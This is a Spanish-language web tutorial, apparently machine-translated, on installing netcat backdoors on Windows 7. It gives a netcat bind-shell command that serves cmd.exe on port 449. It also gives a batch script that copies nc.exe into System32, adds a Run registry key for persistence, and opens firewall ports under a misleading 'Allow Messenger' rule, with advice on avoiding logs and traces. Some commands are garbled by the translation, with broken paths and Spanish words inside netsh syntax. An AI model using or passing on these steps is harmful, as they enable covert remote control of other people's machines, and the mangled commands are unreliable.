Red de conocimiento informático - Material del sitio web - Cómo instalar puertas traseras en Windows y Linux

Cómo instalar puertas traseras en Windows y Linux

Preparación 0×00

Suponiendo que el usuario inicia sesión en el sistema con derechos de administrador, utilice netcat para crear una puerta trasera en el sistema Windows 7.

Netcat está relativamente sin implementar y carece de muchas de las capacidades de penetración que necesitamos. Crearemos un conjunto de herramientas portátil para resolver este problema:

1. Descargue el archivo adjunto y guárdelo como archivo adjunto.

2. Edite el archivo especificado.

3. Cree rápidamente puertas traseras de ejecución.

4. Toma el control de un servidor remoto y haz bromas :)

Para que puedas obtener el kit de herramientas lo antes posible, debes colocarlo en una unidad USB separada. o servidor en línea.

Aplicaciones portátiles

Una aplicación portátil es un programa que se puede utilizar sin instalación, generalmente empaquetando todo el entorno de ejecución y el programa principal en un único archivo portátil. En el proceso de ejecución del archivo independiente, libera sus propios requisitos y crea un entorno en el que el programa de destino puede ejecutarse sin problemas.

1. No depende de un dll específico (el dll ha sido empaquetado)

2. No depende de la configuración del registro (puede inicializarse por sí mismo), sin dejar rastros de las operaciones del registro

3. Minimiza los rastros de operaciones y trata de evitar todas las operaciones innecesarias para evitar dejar demasiados registros de operaciones del sistema.

Crea un conjunto de herramientas para Windows 7.

gVim (a través del editor de texto de plataforma, que proporciona potentes funciones de interacción de línea de comandos)

Wget (descarga la versión de Windows de 64 bits)

Netcat

Usuarios que utilizan el sistema Kali puede usar "find / -name nc.exe " Buscar cat-for-windows/

0×01 Primer intento en la puerta trasera de Netcat

nc.exe -dLp 449 -e cmd. exe -L Esta opción activa un servicio de escucha y espera a que los clientes se conecten, luego proporciona interacciones apropiadas una vez que el cliente se conecta exitosamente.

- p especifica el puerto en el que escucha el programa (los derechos de no administrador solo se aplican a puertos superiores a 1024. No puede reutilizar un puerto existente)

- e recibe una conexión de cliente después eso, se ejecutará un programa específico (cmd.exe en este caso). exe), este programa es responsable de la siguiente interacción de la sesión (ejecutando cualquier comando enviado por el cliente en una etapa posterior)

-d adopta el modo de escucha silenciosa para evitar que nc se ejecute en modo de escucha silenciosa y así evitar la grabación. Demasiados registros

Script por lotes de instalación de puerta trasera de Windows 7

@echo off

Rem copia archivos al directorio del sistema

xcopy "systemdrive \username\Desktop\nc.exe" "C:

\Windows\System32\" - Modifica el registro para agregar un código de inicio automático de puerta trasera.

reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "sistema" /t

REG_SZ /d "C:\windows\system32\nc .exe -Ldp 449 -e cmd.exe"

Rem Agregue reglas de firewall, abra el puerto de escucha 449 y permita conexiones externas.

netsh advfirewall firewall agregar nombre de regla="Regla 34" dir=in action=allow

protocol=UDP localport=449

netsh advfirewall firewall agregar nombre de regla ="Regla 35" dir=in action=allow

protocol=TCP localport=449

Rem Agregue una regla de firewall para permitir que nc.exe proporcione conexiones externas.

netsh advfirewall firewall agregar regla nombre="Allow Messenger" dir=in action=allow

program="C:\windows\system32\nc.exe"

Rem Agregue la regla de firewall para permitir que nc.exe proporcione conexiones externas.